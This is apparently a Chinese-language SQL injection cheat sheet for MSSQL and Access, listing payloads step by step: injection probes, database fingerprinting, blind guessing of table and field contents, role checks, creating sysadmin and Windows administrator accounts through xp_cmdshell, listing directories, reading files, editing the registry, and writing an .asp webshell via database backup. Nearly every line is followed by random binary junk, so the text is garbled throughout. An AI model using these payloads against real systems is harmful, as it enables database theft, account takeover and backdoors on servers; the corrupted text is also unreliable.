1.判断是否有注入;and 1=1 ;and 1=2 � 'P@��=/�
2.初步判断是否是mssql ;and user>0 Tjd&��^m�
E0sbU<1�1�
3.注入参数是字符'and [查询条件] and ''=' #@nZ�4=�/z
7�^k�H8qJ)
4.搜索时没过滤参数的'and [查询条件] and '%25'=' z7'n,�� �[
sl~b\���j�
5.判断数据库系统 $s�e !8s"�
06PhrPVa!\
;and (select count(*) from sysobjects)>0 mssql '�4a�f�
],
�k)$�iK2I�
;and (select count(*) from msysobjects)>0 access %3]3r*e&5�
aj&\�C���J
\1=T
sU�&^
D"�`%�|`�O
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �UqD5
A~�w
�'9^E8�+=|
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Hm.X}�HO0L
dj?�G.-��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
bZxv/\��
b2a'K�cz�V
9.(1)猜字段的ascii值(access) �
�]a78tTi
��V^j3y`K�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �y'� 2<qj
t�@X M /=d
(2)猜字段的ascii值(mssql)
DY�$yiOH9
=f�Y lzZh�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 V78�Mq:7d�
.�?�A��'6�
10.测试权限结构(mssql) !?yxh/>�lM
DG_}9M!DW@
k�J/+IGV^v
�J09*�v�)L
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �C#�Y�,r)l
S�*;#'j)4+
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- )8�:�n}w�
o��z��Vpfs
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �k"t���>He
Z�mNZS0j��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- $Xf~#� u�H
�7^Hp�VcSM
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Z�&TD+�fT<
s���c<ki�L
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ST�v(k�Q�s
r~��I.F�!{
;and 1=(select IS_MEMBER('db_owner'));-- FSv����1X�
�#U\�$@4D�
:�g&�>D#{�
6���s'[{Ov
11.添加mssql和系统的帐户 SF0Jb"��kS
}Bd_:#.m�w
;exec master.dbo.sp_addlogin username;-- Lg8�]dBX�u
;exec master.dbo.sp_password null,username,password;-- ;.\�g-�`jb
:�#qUM�iu$
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- -P2 @mx%��
q�{/*n]�K
;exec master.dbo.xp_cmdshell 'net user username password b�H�_I7G&m
g��/x_�m�.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- "X�`Qe!zk4
�rYbCO�azr
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ) 9���xX��
X�p#~N�_S$
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- {JTmP�`&l�
��>;m{{nj�
_'��&��k#Q
O!/ekU|,�r
12.(1)遍历目录 �@#�A!w;bz
TWtC-w��I;
;create table dirs(paths varchar(100), id int) �m��.!w�sw
kw3�+�>�{\
;insert dirs exec master.dbo.xp_dirtree 'c:\' (p^S~Ax���
Trpgx�����
;and (select top 1 paths from dirs)>0 k2pT1QZn�t
3��<+z46`?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) f7ZA8�37Un
]/a��
g*F�
'bl%Y)�.9w
/Ad6��+c�Y
(2)遍历目录 2g0K76=Co:
NfO�p�=X?Y
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (N�7O+3+G�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 .3(��;�9};
$N�D9�0my�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 (NP�xab8e*
��}Iip+URG
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 7pz\Sc�S�e
(V8?,G��>�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 9�?$RO[�vo
'P,,<nkr|�
*N`;I@Q"[�
7�2u ��db^
13.mssql中的存储过程 bK?MT]%}�r
x�vd�Y
8%S
xp_regenumvalues 注册表根键, 子键 zs0hXxT�Y:
ZRP�E-l_3:
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �(m�/a�V�
0lBat�_<8�
xp_regread 根键,子键,键值名 d[�S#Duz<&
? -�CV
%�l
;exec xp_regread �YroN�pu]s
s+'XQs^{aj
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 [1Uz_HY["3
xb]o�dYGdW
xp_regwrite 根键,子键, 值名, 值类型, 值 fy`�+Efuj�
�h mds(lv7
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 z|Ap\[��GS
LZ4xfB��(�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 \1]rlzXGUT
4�QO/ff[ o
xp_regdeletevalue 根键,子键,值名 �SD^E7W�$?
JCNk�\@0i*
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 }I]�W�'<jY
/�z��#F,NB
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 x^X$M$o,�l
jFG��5)t<D
�!VFem�~'d
�
�� Y�<aO
14.mssql的backup创建webshell |_, �/�u_
HS�7_�M�GU
use model ]Z/R!y?l"G
]x@~-I )��
create table cmd(str image); �nc&�Jmo7
+Yuzpu�xjJ
insert into cmd(str) values (''); �7OE[RX8!f
F3�D��t7�q
backup database model to disk='c:\l.asp'; ogJ��<e_�m
9qre�|�AA�
26 ?23J�
;
^aHh{�B�Q%
15.mssql内置函数 Wy�."�;/C�
��I��-bF�{
;and (select @@version)>0 获得Windows的版本号 �!LiQ 1`V{
rH�.gF43O:
;and user_name()='dbo' 判断当前系统的连接用户是不是sa n]�v7V&mj\
{-h, Z�dH^
;and (select user_name())>0 爆当前系统的连接用户 +�9C;<��f�
��ED/Fl�L{
;and (select db_name())>0 得到当前连接的数据库 8 URj1� W�
�'W(xgOP1�
x�9~�[Hu�J
;_N��"Fdl�
16.简洁的webshell h�lC�%�H�A
[���@|be.g
use model �a,cC��!
�
�p[-�{]!��
create table cmd(str image); # ��6�6e�@
m8HY�W�zN�
insert into cmd(str) values (''); M~p��=#V1D
)
�$#(ZL^m
backup database model to disk='g:\wwwtest\l.asp';
